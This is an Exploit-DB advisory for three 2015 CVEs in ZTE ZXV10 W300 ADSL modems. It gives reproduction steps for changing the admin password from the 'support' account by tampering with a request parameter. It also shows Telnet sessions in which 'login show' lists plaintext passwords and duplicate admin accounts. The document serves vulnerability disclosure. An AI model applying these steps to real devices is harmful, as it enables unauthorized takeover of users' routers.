ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities

EDB-ID:

38772

CVE:

2015-7259 2015-7258 2015-7257

EDB Verified:

Author:

Karn Ganeshen

Type:

webapps

Exploit:   /  

Platform:

Hardware

Date:

2015-11-20

Vulnerable App: 
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57]

*CVE-ID*:
CVE-2015-7257
CVE-2015-7258
CVE-2015-7259

*Note*: Large deployment size, primarily in Peru, used by TdP.

1 *Insufficient authorization controls*
*CVE-ID*: CVE-2015-7257
Observed in Password Change functionality. Other functions may be
vulnerable as well.

*Expected behavior:*
Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.

*Vulnerability:*
Any non-admin user can change 'admin' password.

*Steps to reproduce:*
a. Login as user 'support' password XXX
b. Access Password Change page - http://<IP>/password.htm
c. Submit request
d. Intercept and Tamper the parameter ­ username ­ change from 'support' to
'admin'
e. Enter the new password ­> old password is not requested ­> Submit
> Login as admin
-> Pwn!


2 *Sensitive information disclosure - clear-text passwords*
*CVE-ID*: CVE-2015-7258
Displaying user information over Telnet connection, shows all valid users
and their passwords in clear­-text.

*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
Username: admin
Password: <­­­ admin/XXX1

$sh
ADSL#login show                 <--­­­ shows user information
Username Password Priority
admin        password1 2
support      password2 0
admin         password3 1

3 *(Potential) Backdoor account feature - **insecure account management*
*CVE-ID*: CVE-2015-7259
Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.

It is considered as a (redundant) login support *feature*.

*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
User Access Verification
Username: admin
Password: <­--­­ admin/password3

$sh
ADSL#login show
Username  Password  Priority
admin  password1  2
support  password2  0
admin  password3  1

+++++
-- 
Best Regards,
Karn Ganeshen
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services